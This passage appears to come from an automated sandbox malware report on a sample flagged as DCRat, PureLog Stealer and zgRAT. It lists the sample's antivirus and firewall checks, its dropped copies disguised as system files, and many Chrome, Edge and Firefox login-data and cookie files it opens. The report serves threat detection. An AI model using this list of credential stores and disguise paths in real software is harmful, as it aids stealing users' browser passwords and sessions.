                              Source: C:\Users\user\Desktop\XNPOazHpXF.exeQueries volume information: C:\Users\user\Desktop\XNPOazHpXF.exe VolumeInformationJump to behavior
                              Source: C:\Users\user\Desktop\XNPOazHpXF.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
                              Source: C:\Users\user\Desktop\XNPOazHpXF.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformationJump to behavior
                              Source: C:\Windows\System32\cmd.exeQueries volume information: C:\ VolumeInformationJump to behavior
                              Source: C:\Windows\InputMethod\CHT\services.exeQueries volume information: C:\Windows\InputMethod\CHT\services.exe VolumeInformationJump to behavior
                              Source: C:\Windows\InputMethod\CHT\services.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
                              Source: C:\Windows\InputMethod\CHT\services.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformationJump to behavior
                              Source: C:\Windows\InputMethod\CHT\services.exeQueries volume information: C:\Windows\Fonts\arialbd.ttf VolumeInformationJump to behavior
                              Source: C:\Users\user\Desktop\XNPOazHpXF.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
                              Source: C:\Windows\InputMethod\CHT\services.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntivirusProduct
                              Source: C:\Windows\InputMethod\CHT\services.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM FirewallProduct

                              Stealing of Sensitive Information

                              barindex
                              Yara detected DCRat
                              Source: Yara matchFile source: 00000007.00000002.3303823064.0000000003794000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                              Source: Yara matchFile source: 00000007.00000002.3303823064.00000000032FB000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                              Source: Yara matchFile source: 00000007.00000002.3303823064.000000000391B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                              Source: Yara matchFile source: 00000000.00000002.2117348326.0000000013BDF000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                              Source: Yara matchFile source: Process Memory Space: XNPOazHpXF.exe PID: 5688, type: MEMORYSTR
                              Source: Yara matchFile source: Process Memory Space: services.exe PID: 1352, type: MEMORYSTR
                              Yara detected PureLog Stealer
                              Source: Yara matchFile source: XNPOazHpXF.exe, type: SAMPLE
                              Source: Yara matchFile source: 0.0.XNPOazHpXF.exe.fb0000.0.unpack, type: UNPACKEDPE
                              Source: Yara matchFile source: 00000000.00000000.2052319303.0000000000FB2000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                              Source: Yara matchFile source: C:\Recovery\dllhost.exe, type: DROPPED
                              Source: Yara matchFile source: C:\ProgramData\OfJItdCHnFwJKGdVvarOLqclbfs.exe, type: DROPPED
                              Source: Yara matchFile source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\XNPOazHpXF.exe, type: DROPPED
                              Source: Yara matchFile source: C:\Recovery\conhost.exe, type: DROPPED
                              Source: Yara matchFile source: C:\Windows\InputMethod\CHT\services.exe, type: DROPPED
                              Yara detected zgRAT
                              Source: Yara matchFile source: XNPOazHpXF.exe, type: SAMPLE
                              Source: Yara matchFile source: 0.0.XNPOazHpXF.exe.fb0000.0.unpack, type: UNPACKEDPE
                              Source: Yara matchFile source: C:\Recovery\dllhost.exe, type: DROPPED
                              Source: Yara matchFile source: C:\ProgramData\OfJItdCHnFwJKGdVvarOLqclbfs.exe, type: DROPPED
                              Source: Yara matchFile source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\XNPOazHpXF.exe, type: DROPPED
                              Source: Yara matchFile source: C:\Recovery\conhost.exe, type: DROPPED
                              Source: Yara matchFile source: C:\Windows\InputMethod\CHT\services.exe, type: DROPPED
                              Tries to harvest and steal browser information (history, passwords, etc)
                              Source: C:\Windows\InputMethod\CHT\services.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data For Account-journalJump to behavior
                              Source: C:\Windows\InputMethod\CHT\services.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data-journalJump to behavior
                              Source: C:\Windows\InputMethod\CHT\services.exeFile opened: C:\Users\user\Local Settings\Application Data\Google\Chrome\User Data\Default\Extension Cookies-journalJump to behavior
                              Source: C:\Windows\InputMethod\CHT\services.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data For Account-journalJump to behavior
                              Source: C:\Windows\InputMethod\CHT\services.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Local StateJump to behavior
                              Source: C:\Windows\InputMethod\CHT\services.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension CookiesJump to behavior
                              Source: C:\Windows\InputMethod\CHT\services.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
                              Source: C:\Windows\InputMethod\CHT\services.exeFile opened: C:\Users\user\Local Settings\Application Data\Microsoft\Edge\User Data\Default\Network\Cookies-journalJump to behavior
                              Source: C:\Windows\InputMethod\CHT\services.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
                              Source: C:\Windows\InputMethod\CHT\services.exeFile opened: C:\Users\user\Application Data\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cookies.sqlite-walJump to behavior
                              Source: C:\Windows\InputMethod\CHT\services.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies-journalJump to behavior
                              Source: C:\Windows\InputMethod\CHT\services.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies-journalJump to behavior
                              Source: C:\Windows\InputMethod\CHT\services.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Local StateJump to behavior
                              Source: C:\Windows\InputMethod\CHT\services.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data-journalJump to behavior
                              Source: C:\Windows\InputMethod\CHT\services.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Web Data-journalJump to behavior
                              Source: C:\Windows\InputMethod\CHT\services.exeFile opened: C:\Users\user\Local Settings\Application Data\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
                              Source: C:\Windows\InputMethod\CHT\services.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Google\Chrome\User Data\Default\Web Data-journalJump to behavior
                              Source: C:\Windows\InputMethod\CHT\services.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
                              Source: C:\Windows\InputMethod\CHT\services.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Default\Network\Cookies-journalJump to behavior
                              Source: C:\Windows\InputMethod\CHT\services.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies-journalJump to behavior
                              Source: C:\Windows\InputMethod\CHT\services.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Microsoft\Edge\User Data\Default\Login DataJump to behavior
                              Source: C:\Windows\InputMethod\CHT\services.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data-journalJump to behavior
                              Source: C:\Windows\InputMethod\CHT\services.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Web DataJump to behavior
                              Source: C:\Windows\InputMethod\CHT\services.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Default\Network\Cookies-journalJump to behavior
                              Source: C:\Windows\InputMethod\CHT\services.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data For AccountJump to behavior
                              Source: C:\Windows\InputMethod\CHT\services.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Web DataJump to behavior
                              Source: C:\Windows\InputMethod\CHT\services.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Default\Network\Cookies-journalJump to behavior
                              Source: C:\Windows\InputMethod\CHT\services.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies-journalJump to behavior
                              Source: C:\Windows\InputMethod\CHT\services.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies-journalJump to behavior
                              Source: C:\Windows\InputMethod\CHT\services.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data For Account-journalJump to behavior
                              Source: C:\Windows\InputMethod\CHT\services.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Default\Login Data-journalJump to behavior
                              Source: C:\Windows\InputMethod\CHT\services.exeFile opened: C:\Users\user\AppData\Local\Application Data\Google\Chrome\User Data\Local StateJump to behavior
                              Source: C:\Windows\InputMethod\CHT\services.exeFile opened: C:\Users\user\Local Settings\Microsoft\Edge\User Data\Default\Network\Cookies-journalJump to behavior
                              Source: C:\Windows\InputMethod\CHT\services.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Local StateJump to behavior
                              Source: C:\Windows\InputMethod\CHT\services.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Default\Network\Cookies-journalJump to behavior
                              Source: C:\Windows\InputMethod\CHT\services.exeFile opened: C:\Users\user\AppData\Local\Application Data\Google\Chrome\User Data\Default\Web Data-journalJump to behavior
                              Source: C:\Windows\InputMethod\CHT\services.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data For Account-journalJump to behavior
                              Source: C:\Windows\InputMethod\CHT\services.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data For AccountJump to behavior
                              Source: C:\Windows\InputMethod\CHT\services.exeFile opened: C:\Users\user\Local Settings\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
                              Source: C:\Windows\InputMethod\CHT\services.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
                              Source: C:\Windows\InputMethod\CHT\services.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
                              Source: C:\Windows\InputMethod\CHT\services.exeFile opened: C:\Users\user\Local Settings\Application Data\Google\Chrome\User Data\Default\Network\Cookies-journalJump to behavior
                              Source: C:\Windows\InputMethod\CHT\services.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
                              Source: C:\Windows\InputMethod\CHT\services.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Default\Login DataJump to behavior
                              Source: C:\Windows\InputMethod\CHT\services.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
                              Source: C:\Windows\InputMethod\CHT\services.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Microsoft\Edge\User Data\Default\Login Data-journalJump to behavior
                              Source: C:\Windows\InputMethod\CHT\services.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Microsoft\Edge\User Data\Default\Login Data-journalJump to behavior
                              Source: C:\Windows\InputMethod\CHT\services.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension CookiesJump to behavior
                              Source: C:\Windows\InputMethod\CHT\services.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies-journalJump to behavior
                              Source: C:\Windows\InputMethod\CHT\services.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Default\Login Data-journalJump to behavior
                              Source: C:\Windows\InputMethod\CHT\services.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Web DataJump to behavior
                              Source: C:\Windows\InputMethod\CHT\services.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data-journalJump to behavior
                              Source: C:\Windows\InputMethod\CHT\services.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Default\Login DataJump to behavior
                              Source: C:\Windows\InputMethod\CHT\services.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Local StateJump to behavior
                              Source: C:\Windows\InputMethod\CHT\services.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Google\Chrome\User Data\Default\Extension CookiesJump to behavior
                              Source: C:\Windows\InputMethod\CHT\services.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Google\Chrome\User Data\Local StateJump to behavior
                              Source: C:\Windows\InputMethod\CHT\services.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies-journalJump to behavior
                              Source: C:\Windows\InputMethod\CHT\services.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Web DataJump to behavior
                              Source: C:\Windows\InputMethod\CHT\services.exeFile opened: C:\Users\user\AppData\Local\Application Data\Google\Chrome\User Data\Default\Extension CookiesJump to behavior
                              Source: C:\Windows\InputMethod\CHT\services.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Web Data-journalJump to behavior
                              Source: C:\Windows\InputMethod\CHT\services.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
                              Source: C:\Windows\InputMethod\CHT\services.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies-journalJump to behavior
                              Source: C:\Windows\InputMethod\CHT\services.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Google\Chrome\User Data\Default\Web DataJump to behavior
                              Source: C:\Windows\InputMethod\CHT\services.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data For Account-journalJump to behavior
                              Source: C:\Windows\InputMethod\CHT\services.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login DataJump to behavior
                              Source: C:\Windows\InputMethod\CHT\services.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
                              Source: C:\Windows\InputMethod\CHT\services.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies-journalJump to behavior
                              Source: C:\Windows\InputMethod\CHT\services.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data-journalJump to behavior
                              Source: C:\Windows\InputMethod\CHT\services.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data-journalJump to behavior
                              Source: C:\Windows\InputMethod\CHT\services.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login DataJump to behavior
                              Source: C:\Windows\InputMethod\CHT\services.exeFile opened: C:\Users\user\Application Data\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cookies.sqlite-shmJump to behavior
                              Source: C:\Windows\InputMethod\CHT\services.exeFile opened: C:\Users\user\AppData\Local\Application Data\Google\Chrome\User Data\Default\Login Data For AccountJump to behavior
                              Source: C:\Windows\InputMethod\CHT\services.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Default\Login Data-journalJump to behavior
                              Source: C:\Windows\InputMethod\CHT\services.exeFile opened: C:\Users\user\Local Settings\Application Data\Google\Chrome\User Data\Default\Login DataJump to behavior
                              Source: C:\Windows\InputMethod\CHT\services.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
                              Source: C:\Windows\InputMethod\CHT\services.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data-journalJump to behavior
                              Source: C:\Windows\InputMethod\CHT\services.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies-journalJump to behavior
                              Source: C:\Windows\InputMethod\CHT\services.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies-journalJump to behavior
                              Source: C:\Windows\InputMethod\CHT\services.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Local StateJump to behavior
                              Source: C:\Windows\InputMethod\CHT\services.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Default\Login Data-journalJump to behavior
                              Source: C:\Windows\InputMethod\CHT\services.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension CookiesJump to behavior
                              Source: C:\Windows\InputMethod\CHT\services.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Web Data-journalJump to behavior
                              Source: C:\Windows\InputMethod\CHT\services.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
                              Source: C:\Windows\InputMethod\CHT\services.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension CookiesJump to behavior
                              Source: C:\Windows\InputMethod\CHT\services.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension Cookies-journalJump to behavior
                              Source: C:\Windows\InputMethod\CHT\services.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
                              Source: C:\Windows\InputMethod\CHT\services.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Default\Login DataJump to behavior
                              Source: C:\Windows\InputMethod\CHT\services.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Default\Network\Cookies-journalJump to behavior
                              Source: C:\Windows\InputMethod\CHT\services.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension CookiesJump to behavior
                              Source: C:\Windows\InputMethod\CHT\services.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Default\Login Data-journalJump to behavior
                              Source: C:\Windows\InputMethod\CHT\services.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Default\Login Data-journalJump to behavior
                              Source: C:\Windows\InputMethod\CHT\services.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login DataJump to behavior
                              Source: C:\Windows\InputMethod\CHT\services.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Default\Login DataJump to behavior
                              Source: C:\Windows\InputMethod\CHT\services.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Default\Login DataJump to behavior
                              Source: C:\Windows\InputMethod\CHT\services.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
                              Source: C:\Windows\InputMethod\CHT\services.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Web DataJump to behavior
                              Source: C:\Windows\InputMethod\CHT\services.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Default\Login DataJump to behavior
                              Source: C:\Windows\InputMethod\CHT\services.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Web DataJump to behavior
                              Source: C:\Windows\InputMethod\CHT\services.exeFile opened: C:\Users\user\AppData\Local\Application Data\Google\Chrome\User Data\Default\Web DataJump to behavior
                              Source: C:\Windows\InputMethod\CHT\services.exeFile opened: C:\Users\user\Local Settings\Application Data\Microsoft\Edge\User Data\Default\Login Data-journalJump to behavior
                              Source: C:\Windows\InputMethod\CHT\services.exeFile opened: C:\Users\user\AppData\Local\Application Data\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
                              Source: C:\Windows\InputMethod\CHT\services.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data-journalJump to behavior
                              Source: C:\Windows\InputMethod\CHT\services.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Local StateJump to behavior
                              Source: C:\Windows\InputMethod\CHT\services.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Default\Login DataJump to behavior
                              Source: C:\Windows\InputMethod\CHT\services.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Default\Network\Cookies-journalJump to behavior
                              Source: C:\Windows\InputMethod\CHT\services.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
                              Source: C:\Windows\InputMethod\CHT\services.exeFile opened: C:\Users\user\AppData\Local\Application Data\Microsoft\Edge\User Data\Default\Login DataJump to behavior
                              Source: C:\Windows\InputMethod\CHT\services.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data For AccountJump to behavior
                              Source: C:\Windows\InputMethod\CHT\services.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Google\Chrome\User Data\Default\Login DataJump to behavior
                              Source: C:\Windows\InputMethod\CHT\services.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data For Account-journalJump to behavior
                              Source: C:\Windows\InputMethod\CHT\services.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login DataJump to behavior
                              Source: C:\Windows\InputMethod\CHT\services.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Web Data-journalJump to behavior
                              Source: C:\Windows\InputMethod\CHT\services.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies-journalJump to behavior
                              Source: C:\Windows\InputMethod\CHT\services.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Local StateJump to behavior
                              Source: C:\Windows\InputMethod\CHT\services.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension CookiesJump to behavior
                              Source: C:\Windows\InputMethod\CHT\services.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Default\Login Data-journalJump to behavior
                              Source: C:\Windows\InputMethod\CHT\services.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Web Data-journalJump to behavior
                              Source: C:\Windows\InputMethod\CHT\services.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Google\Chrome\User Data\Default\Login DataJump to behavior
                              Source: C:\Windows\InputMethod\CHT\services.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Local StateJump to behavior
                              Source: C:\Windows\InputMethod\CHT\services.exeFile opened: C:\Users\user\Local Settings\Google\Chrome\User Data\Default\Login Data For AccountJump to behavior
                              Source: C:\Windows\InputMethod\CHT\services.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login DataJump to behavior
                              Source: C:\Windows\InputMethod\CHT\services.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies-journalJump to behavior
                              Source: C:\Windows\InputMethod\CHT\services.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies-journalJump to behavior
                              Source: C:\Windows\InputMethod\CHT\services.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Default\Login DataJump to behavior
                              Source: C:\Windows\InputMethod\CHT\services.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension CookiesJump to behavior
                              Source: C:\Windows\InputMethod\CHT\services.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension CookiesJump to behavior
